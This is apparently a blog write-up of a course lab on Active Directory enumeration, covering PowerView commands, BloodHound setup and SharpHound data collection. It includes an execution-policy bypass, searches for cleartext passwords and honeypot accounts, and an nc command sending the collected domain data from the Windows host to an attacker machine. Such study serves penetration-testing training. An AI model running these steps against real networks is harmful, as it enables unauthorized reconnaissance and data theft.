Active Directory Enumeration Hacker Notes

Posted on

Post enumeration of lab with credentials/hashes captured. Overview of PowerView and Bloodhound setup/usage.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.

Based off TheCyberMentor amazing Udemy course available at https://www.udemy.com/course/practical-ethical-hacking/

Requirements/Tools

Requirements: With credentials recovered from the mitm attack we can use tools

Tools:

Using PowerView

Download PowerView.ps1 to target Execute policy bypass (used to execute scripts - not security)

1
1
powershell -ep bypass

Execute PowerView

1
. .\PowerView.ps1

Very powerful tool with more information available via cheat sheet:

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Get Domain Policy:

1
Get-DomainPolicy


1
Get-NetDomain


1
2
Get-DomainPolicy
(Get-DomainPolicy)."system access"

find password length and just start attacking with 7 chars passwords.

Find Users:

1
Get-NetUser

Long semi unreadable list

Refined list:

1
2
3
Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetUser | select description #find if any passwords in cleartext

List property we can search for via pipe:

1
Get-UserProperty

Find properties of the passwords last set:

1
Get-UserProperty -Properties pwdlastset

can find if we have stale passwords on the network.

Check Logon Count (used to identify honeypot accounts):

1
Get-UserProperty -Properties logoncount

Check bad password counts (You can see if an account is under attack):

1
Get-UserProperty -Properties badpwdcount

List all network domain computers:

1
Get-NetComputer

more information:

1
Get-NetComputer -FullData

Slightly too much information

Find the operating systems:

1
Get-NetComputer -FullData | Select OperatingSystem

Pick apart the network as to which are the servers.

Find Domain Admins

1
Get-NetGroup -GroupName *admin*

Get Members of Admins

1
Get-NetGroupMember -GroupName "Domain Admins"

Find All SMB Shares on the Network:

1
Invoke-ShareFinder

Find All Group Policies:

Check GPO for changes in displaynames and when they were changed:

1
Get-NetGPO | select displayname, whenchanged

condensed version of larger output.

Bloodhound

Downloads the data from Active Directory and put into a visual graph.

1
apt install bloodhound

neo4j console setup neo4j - change default passwords

open at link:

login with neo4j:neo4j - prompted to change password

opted to used kali password.

Neo4j Dashboard

Launch Bloodhound - Linux/Kali

1
bloodhound

Login with neo4j account and neo4j account URL. - Bloodhoud setup and next step to pull data with injester.

Pull data with In-jester

  • invoke bloodhound - powershell

Link: https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1

  • Place onto windows 10 machine

Within command prompt setup ep bypass

1
1
powershell -ep bypass

Call Sharphound.ps1

1
. .\Sharphound.ps1

Invoke Sharphound

1
Invoke-Bloodhound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip

Move file to kali - Used nc file transfer method - downloaded nc.exe via SimpleHTTPServer on kali.

nc File Transfer Method:

  • Kali setup listener: ncat -lvp 80 > file.zip

  • Windows 10 machine nc -nv 192.168.175.129 80 < file.zip -w15

file received:

Import file.zip into Bloodhound Upload file.zip via upload button within bloodhound:

at this point my Bloodhound crashed when loading file.zip to which I attempted to reinstall… and failed. Moved to create for source… failed. All mainly due to the fact that i was on x86 version of Kali. Moved to Install Bloodhound on a Windows 10 machine following these directions:

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

Neoj4 BloodHound issues:

IMPORTANT: When you install java on the machine you will need to edit line 75:

1
C:\Users\fcastle\Downloads\neo4j-community-3.5.14-windows\neo4j-community-3.5.14\bin\Neo4j-Management\Get-Java.ps1

and within the java folder you need to copy the “client” folder and paste it as “server”:

1
C:\Program Files (x86)\Java\jre1.8.0_231\bin

Launch Bloodhound - Windows

From this point was able to load the file.zip into BloodHound:

Queries:

Finding domain admins via “Find all Domain Admins” query

You will want to target boxes with Domain Admins have accounts.

  • Locating High Value Targets via Query

to which paths get illuminated in red to follow

highlighted via course map

Once a network is compromised you can plan your next target with Bloodhound.